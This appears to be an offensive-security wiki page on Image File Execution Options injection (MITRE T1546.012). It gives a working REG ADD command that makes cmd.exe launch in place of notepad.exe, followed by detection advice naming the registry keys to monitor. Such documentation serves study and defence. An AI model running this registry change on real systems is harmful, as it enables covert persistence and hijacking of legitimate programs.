search

Image File Execution Options Injection

Defense Evasion, Persistence, Privilege Escalation

hashtag
Execution

Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:

attacker@victim
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"

Launching a notepad on the victim system:

Same from the cmd shell:

hashtag
Observations

Monitoring command line arguments and events modifying registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> should be helpful in detecting this attack:

hashtag
References

LogoEvent Triggered Execution: Image File Execution Options Injection, Sub-technique T1546.012 - Enterprise | MITRE ATT&CK®attack.mitre.orgchevron-right
LogoImage File Execution Options (IFEO)MicrosoftLearnchevron-right
LogoA Debugging Approach to IFEOMicrosoftLearnchevron-right
PreviousWebShellsNextUnquoted Service Paths

Last updated